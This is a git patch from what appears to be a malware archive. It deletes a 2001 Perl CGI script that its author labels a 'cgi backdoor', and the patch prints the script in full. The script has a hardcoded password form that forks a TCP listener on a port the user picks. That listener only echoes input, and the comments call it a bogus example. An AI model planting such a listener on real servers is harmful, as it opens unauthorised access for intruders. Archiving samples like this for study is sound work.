From 838843ac5ee4c763bf372ed19d7f94107980078f Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 01:31:52 -0600 Subject: [PATCH] Delete HackTool.Perl.Ulgin na --- Perl/HackTool.Perl.Ulgin | 48 ---------------------------------------- 1 file changed, 48 deletions(-) delete mode 100644 Perl/HackTool.Perl.Ulgin diff --git a/Perl/HackTool.Perl.Ulgin b/Perl/HackTool.Perl.Ulgin deleted file mode 100644 index 022cfab2..00000000 --- a/Perl/HackTool.Perl.Ulgin +++ /dev/null @@ -1,48 +0,0 @@ -# jerusalem (c) 2001 -# heavily untested and on_the_fly done cgi (i've written this code on my -# organizer) - jerusalem@digitalmaphia.com / j3rus4lem@users.sourceforge.net -$password = "phj34r"; # as usual -## -note -## if you don't want to show your password in clear (in the sourcecode) -## use perl's crypt() function. a bogus example of this can be found -## into http://sgxxx.net/users/jerusalem/ulogin.pl *subliminal message* -use CGI qw/:standard/; -print header, -start_html('cgi backdoor - jerusalem\@digitalmaphia.com 2001'), -h1('cgi backdoor - jerusalem\@digitalmaphia.com 2001'), -start_form, -"password: ",password_field('pass'),p, -"port: ",textfield('port'), -# if you want your pass shown in clear just subst the password_field() function -# with a textfield() one -submit, -end_form, -hr; -if (param()) { -$pass = ""."$password".""; -if (em(param('pass')) eq $pass) { werk(); } -else { stfu(); } -sub stfu { print "password incorrect. sorry.\n"; } -hr; -} -# This subroutine is a little and bogus example of what you can do -# using a perl cgi. In this case, a daemon like the unix' echo is -# started and forked under a pid. -sub werk { -$aaa = em(param('port')); -$aaa =~ s/<.*?>//g; -my $pid = fork(); if ($pid) { exit(); } -yeha(); -sub yeha { -use IO::Socket; -my $port = $aaa; -my $socket = IO::Socket::INET->new(Listen => 5, - LocalPort => $port, - Proto => 'tcp', - Reuse => 1); -while ($new = $socket->accept()) { $new->autoflush(1); command(); } -sub command { while (<$new>) { $comm = $_; chomp $comm; -print $new "$comm\n"; -command(); } } -} -}